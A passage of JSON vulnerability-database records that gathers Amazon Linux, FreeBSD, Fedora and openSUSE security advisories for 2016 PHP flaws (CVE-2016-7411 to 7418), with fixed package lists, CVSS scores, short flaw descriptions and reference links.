\u00a0\u00a0\u00a0 php70-cli-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-odbc-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-zip-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-common-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-embedded-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-pdo-dblib-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-fpm-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-pdo-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-devel-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-mysqlnd-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-dba-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-xmlrpc-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-dbg-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-pgsql-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-pspell-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-opcache-7.0.11-1.16.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-debuginfo-7.0.11-1.16.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 php70-7.0.11-1.16.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 php70-tidy-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-imap-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-pspell-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-mbstring-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-intl-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-dba-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-embedded-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-mysqlnd-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-soap-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-zip-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-opcache-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-gmp-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-pdo-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-fpm-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-snmp-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-common-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-mcrypt-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-pgsql-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-enchant-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-recode-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-odbc-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-json-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-cli-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-xmlrpc-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-ldap-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-pdo-dblib-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-devel-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-process-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-debuginfo-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-dbg-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-bcmath-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-gd-7.0.11-1.16.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-xml-7.0.11-1.16.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2016-7412](<https://access.redhat.com/security/cve/CVE-2016-7412>), [CVE-2016-7413](<https://access.redhat.com/security/cve/CVE-2016-7413>), [CVE-2016-7414](<https://access.redhat.com/security/cve/CVE-2016-7414>), [CVE-2016-7416](<https://access.redhat.com/security/cve/CVE-2016-7416>), [CVE-2016-7417](<https://access.redhat.com/security/cve/CVE-2016-7417>), [CVE-2016-7418](<https://access.redhat.com/security/cve/CVE-2016-7418>)\n\nMitre: [CVE-2016-7412](<https://vulners.com/cve/CVE-2016-7412>), [CVE-2016-7413](<https://vulners.com/cve/CVE-2016-7413>), [CVE-2016-7414](<https://vulners.com/cve/CVE-2016-7414>), [CVE-2016-7416](<https://vulners.com/cve/CVE-2016-7416>), [CVE-2016-7417](<https://vulners.com/cve/CVE-2016-7417>), [CVE-2016-7418](<https://vulners.com/cve/CVE-2016-7418>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-12T17:00:00", "type": "amazon", "title": "Medium: php70", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2016-10-12T17:00:00", "id": "ALAS-2016-754", "href": "https://alas.aws.amazon.com/ALAS-2016-754.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:23:29", "description": "**Issue Overview:**\n\next/standard/var_unserializer.re in PHP before 5.6.26 mishandles object-deserialization failures, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via an unserialize call that references a partially constructed object (CVE-2016-7411).\n\next/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26 and 7.x before 7.0.11 does not verify that a BIT field has the UNSIGNED_FLAG flag, which allows remote MySQL servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact via crafted field metadata (CVE-2016-7412).\n\nUse-after-free vulnerability in the wddx_stack_destroy function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a wddxPacket XML document that lacks an end-tag for a recordset field element, leading to mishandling in a wddx_deserialize call (CVE-2016-7413).\n\nThe ZIP signature-verification feature in PHP before 5.6.26 and 7.x before 7.0.11 does not ensure that the uncompressed_filesize field is large enough, which allows remote attackers to cause a denial of service (out-of-bounds memory access) or possibly have unspecified other impact via a crafted PHAR archive, related to ext/phar/util.c and ext/phar/zip.c (CVE-2016-7414).\n\next/intl/msgformat/msgformat_format.c in PHP before 5.6.26 and 7.x before 7.0.11 does not properly restrict the locale length provided to the Locale class in the ICU library, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a MessageFormatter::formatMessage call with a long first argument (CVE-2016-7416).\n\next/spl/spl_array.c in PHP before 5.6.26 and 7.x before 7.0.11 proceeds with SplArray unserialization without validating a return value and data type, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data (CVE-2016-7417).\n\nThe php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service (invalid pointer access and out-of-bounds read) or possibly have unspecified other impact via an incorrect boolean element in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call (CVE-2016-7418). \n\n\n \n**Affected Packages:** \n\n\nphp56\n\n \n**Issue Correction:** \nRun _yum update php56_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 php56-tidy-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-bcmath-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-fpm-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-mysqlnd-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-intl-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-cli-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-mssql-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-enchant-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-dba-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-soap-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-common-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-mcrypt-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-gmp-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-process-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-pspell-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-mbstring-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-pgsql-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-debuginfo-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-dbg-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-imap-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-odbc-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-snmp-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-ldap-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-embedded-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-xmlrpc-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-devel-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-pdo-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-gd-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-opcache-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-recode-5.6.26-1.128.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-xml-5.6.26-1.128.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 php56-5.6.26-1.128.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 php56-process-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-dba-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-odbc-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-intl-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-pgsql-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-recode-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-gmp-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-enchant-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-xml-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-ldap-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-bcmath-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-devel-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-mbstring-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-common-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-soap-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-dbg-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-pspell-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-debuginfo-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-snmp-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-xmlrpc-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-mssql-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-cli-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-pdo-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-opcache-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-gd-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-fpm-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-mysqlnd-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-embedded-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-tidy-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-imap-5.6.26-1.128.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-mcrypt-5.6.26-1.128.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2016-7411](<https://access.redhat.com/security/cve/CVE-2016-7411>), [CVE-2016-7412](<https://access.redhat.com/security/cve/CVE-2016-7412>), [CVE-2016-7413](<https://access.redhat.com/security/cve/CVE-2016-7413>), [CVE-2016-7414](<https://access.redhat.com/security/cve/CVE-2016-7414>), [CVE-2016-7416](<https://access.redhat.com/security/cve/CVE-2016-7416>), [CVE-2016-7417](<https://access.redhat.com/security/cve/CVE-2016-7417>), [CVE-2016-7418](<https://access.redhat.com/security/cve/CVE-2016-7418>)\n\nMitre: [CVE-2016-7411](<https://vulners.com/cve/CVE-2016-7411>), [CVE-2016-7412](<https://vulners.com/cve/CVE-2016-7412>), [CVE-2016-7413](<https://vulners.com/cve/CVE-2016-7413>), [CVE-2016-7414](<https://vulners.com/cve/CVE-2016-7414>), [CVE-2016-7416](<https://vulners.com/cve/CVE-2016-7416>), [CVE-2016-7417](<https://vulners.com/cve/CVE-2016-7417>), [CVE-2016-7418](<https://vulners.com/cve/CVE-2016-7418>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-12T17:00:00", "type": "amazon", "title": "Medium: php56", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2016-10-12T17:00:00", "id": "ALAS-2016-753", "href": "https://alas.aws.amazon.com/ALAS-2016-753.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2023-06-03T15:04:39", "description": "\n\nPHP reports:\n\n\nFixed bug #73007 (add locale length check)\nFixed bug #72293 (Heap overflow in mysqlnd related to BIT fields)\nFixed bug #72928 (Out of bound when verify signature of zip phar in phar_parse_zipfile)\nFixed bug #73029 (Missing type check when unserializing SplArray)\nFixed bug #73052 (Memory Corruption in During Deserialized-object Destruction)\nFixed bug #72860 (wddx_deserialize use-after-free)\nFixed bug #73065 (Out-Of-Bounds Read in php_wddx_push_element)\n\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-09-15T00:00:00", "type": "freebsd", "title": "PHP -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2016-09-15T00:00:00", "id": "F471032A-8700-11E6-8D93-00248C0C745D", "href": "https://vuxml.freebsd.org/freebsd/f471032a-8700-11e6-8d93-00248c0c745d.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:04:39", "description": "\n\nPHP reports:\n\n\nFixed bug #73007 (add locale length check)\nFixed bug #72293 (Heap overflow in mysqlnd related to BIT fields)\nFixed bug #72928 (Out of bound when verify signature of zip phar in phar_parse_zipfile)\nFixed bug #73029 (Missing type check when unserializing SplArray)\nFixed bug #73052 (Memory Corruption in During Deserialized-object Destruction)\nFixed bug #72860 (wddx_deserialize use-after-free)\nFixed bug #73065 (Out-Of-Bounds Read in php_wddx_push_element)\n\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-09-16T00:00:00", "type": "freebsd", "title": "PHP -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2016-09-16T00:00:00", "id": "8D5180A6-86FE-11E6-8D93-00248C0C745D", "href": "https://vuxml.freebsd.org/freebsd/8d5180a6-86fe-11e6-8d93-00248c0c745d.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module (often referred to as mod_php) which adds support for the PHP language to Apache HTTP Server. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-09-28T04:52:34", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: php-5.6.26-1.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2016-09-28T04:52:34", "id": "FEDORA:B0F3260776C0", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/2OAOLNCQKFGIGAQBUCUAYISLRZSQCLEW/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module (often referred to as mod_php) which adds support for the PHP language to Apache HTTP Server. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-09-27T03:58:11", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: php-5.6.26-1.fc24", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2016-09-27T03:58:11", "id": "FEDORA:048C660748C7", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/HCPYXRCCP6O73RVWR5XSFZK2TBUYIY3M/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-10-14T17:27:48", "description": "This update for php5 fixes the following security issues:\n\n * CVE-2016-7411: php5: Memory corruption when destructing deserialized\n object\n * CVE-2016-7412: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG\n in BIT field\n * CVE-2016-7413: Use after free in wddx_deserialize\n * CVE-2016-7414: Out of bounds heap read when verifying signature of zip\n phar in phar_parse_zipfile\n * CVE-2016-7416: Stack based buffer overflow in msgfmt_format_message\n * CVE-2016-7417: Missing type check when unserializing SplArray\n * CVE-2016-7418: Null pointer dereference in php_wddx_push_element\n\n This update was imported from the SUSE:SLE-12:Update update project.\n\n", "cvss3": {}, "published": "2016-10-14T16:11:34", "type": "suse", "title": "Security update for php5 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-7414", "CVE-2016-7413", "CVE-2016-7416", "CVE-2016-7411", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7412"], "modified": "2016-10-14T16:11:34", "id": "OPENSUSE-SU-2016:2540-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00031.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-10-04T17:27:47", "description": "This update for php5 fixes the following security issues:\n\n * CVE-2016-7411: Memory corruption when destructing deserialized object\n * CVE-2016-7412: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG\n in BIT field\n * CVE-2016-7413: Use after free in wddx_deserialize\n * CVE-2016-7414: Out of bounds heap read when verifying signature of zip\n phar in phar_parse_zipfile\n * CVE-2016-7416: Stack based buffer overflow in msgfmt_format_message\n * CVE-2016-7417: Missing type check when unserializing SplArray\n * CVE-2016-7418: Null pointer dereference in php_wddx_push_element\n\n", "cvss3": {}, "published": "2016-10-04T16:10:25", "type": "suse", "title": "Security update for php5 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-7414", "CVE-2016-7413", "CVE-2016-7416", "CVE-2016-7411", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7412"], "modified": "2016-10-04T16:10:25", "id": "OPENSUSE-SU-2016:2444-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00002.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-11-01T17:27:52", "description": "This update for php5 fixes the following security issues:\n\n * CVE-2016-7411: php5: Memory corruption when destructing deserialized\n object\n * CVE-2016-7412: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG\n in BIT field\n * CVE-2016-7413: Use after free in wddx_deserialize\n * CVE-2016-7414: Out of bounds heap read when verifying signature of zip\n phar in phar_parse_zipfile\n * CVE-2016-7416: Stack based buffer overflow in msgfmt_format_message\n * CVE-2016-7417: Missing type check when unserializing SplArray\n * CVE-2016-7418: Null pointer dereference in php_wddx_push_element\n\n", "cvss3": {}, "published": "2016-11-01T16:07:21", "type": "suse", "title": "Security update for php5 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-7414", "CVE-2016-7413", "CVE-2016-7416", "CVE-2016-7411", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7412"], "modified": "2016-11-01T16:07:21", "id": "SUSE-SU-2016:2477-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-11/msg00000.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-10-07T21:27:37", "description": "This update for php5 fixes the following security issues:\n\n * CVE-2016-7411: php5: Memory corruption when destructing deserialized\n object\n * CVE-2016-7412: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG\n in BIT field\n * CVE-2016-7413: Use after free in wddx_deserialize\n * CVE-2016-7414: Out of bounds heap read when verifying signature of zip\n phar in phar_parse_zipfile\n * CVE-2016-7416: Stack based buffer overflow in msgfmt_format_message\n * CVE-2016-7417: Missing type check when unserializing SplArray\n * CVE-2016-7418: Null pointer dereference in php_wddx_push_element\n\n", "cvss3": {}, "published": "2016-10-07T21:12:50", "type": "suse", "title": "Security update for php5 (important)", "bulletinFamily": "unix", "cvss2": {}, 